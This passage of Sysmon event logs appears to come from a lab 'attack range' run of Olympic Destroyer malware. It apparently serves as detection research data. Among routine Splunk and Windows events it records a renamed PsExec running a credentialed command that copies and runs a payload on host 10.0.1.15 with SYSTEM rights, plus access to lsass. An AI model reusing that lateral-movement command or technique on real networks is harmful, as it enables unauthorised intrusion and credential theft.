Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:21.478{C8EA50B7-1401-6216-8A06-000000003802}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:21.191{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58D0BF6784BB8795CF81299F797CBF08,SHA256=A254C126FC42AF0E73B10FA2C14D2A1C9D01EA75D7F87F6ED7113483C0D8F3B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:21.140{C8EA50B7-1400-6216-8906-000000003802}67167084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218494Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:22.084{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA5911B1DB2498A42583BD24E90FE295,SHA256=6C1B02A0115E05FD2B8074252EF5216D82935A54AF9C135DC1CE8E6E75B137F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.959{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1402-6216-8C06-000000003802}5188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.939{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1402-6216-8C06-000000003802}5188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.823{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1402-6216-8B06-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.808{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.808{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.808{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.808{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.808{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-1402-6216-8B06-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000294204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.816{C8EA50B7-1402-6216-8B06-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.15 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000294203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.808{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1402-6216-8B06-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000294202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.808{C8EA50B7-13E8-6216-8006-000000003802}5776C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000294201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:22.192{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F353D2DCAB106EF0F4F8C7E287AFF44,SHA256=987643BE85D4FE9B2EF8F91C341666FACC006E7F34586E13DEAF7F15C2BF2E2B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:19.524{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53869-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:23.223{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F945BCF54902E8CB93DF692384AFCDF,SHA256=6896BAA3392923DC0283DE370DEBA19FBD69ACD600DFF71805519E48EFBDBE0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218495Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:23.131{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC839B3E5D57AB6CA52D4F2C6C9FE640,SHA256=65F8D3D804408360AA26201C79BAD080664C5CFCA27761F15E535A6438BDD981,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:23.176{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1402-6216-8B06-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:23.176{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1402-6216-8B06-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000294216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:01:23.156{C8EA50B7-1402-6216-8B06-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000294215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:23.060{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1402-6216-8C06-000000003802}5188C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:23.060{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1402-6216-8C06-000000003802}5188C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:23.023{C8EA50B7-1402-6216-8C06-000000003802}51887060C:\Windows\system32\conhost.exe{C8EA50B7-1402-6216-8B06-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:24.242{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2543E10287219085CE07D839FA76562C,SHA256=209FE73246C0A4D30ACE790D8A2564193CE9BC81F797E37EF97D1E4A2392DF82,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218497Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:22.689{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51465-false10.0.1.12-8000- 23542300x8000000000000000218496Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:24.147{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89A1C78A3C7CA3B752BDEA51621C032D,SHA256=B6D52A4B27379F7F710FC5B425A135CA7941F5322A96EF347DD8F3FE0ADD9970,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:25.966{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000294225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:25.966{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:25.966{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF887643.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000294223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:25.397{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\SiteSecurityServiceState.txt2022-02-22 11:23:49.748 23542300x8000000000000000294222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:25.397{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\SiteSecurityServiceState.txtMD5=CAB259081B2B77D4B4C7B6088CCA8E06,SHA256=0D3A4CEAA3AAB815788CAD80F3AE0650F326020C2C7AD803A6AC8E4C38B93779,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:25.247{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C4D068129A22B7F1F5519018166FAFC,SHA256=D41E585970DC65D8FB5A71A4BFF670C5F35F96E2D9EF2BDAD7CAB410210DAF1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218498Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:25.256{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E1D9F028D17E509D134E94D9CF06657,SHA256=CE2727F5C0559136E003CC9EA77FC7701354D417744EA9327A1E8371D6B35C70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:26.284{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56F73708DAD7CF292CEC260943CF0828,SHA256=0A70FAB37BA3E67689F9775FBCE4EA26DBBA01317EB1A69FD9DA915F9249D652,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218499Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:26.287{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program 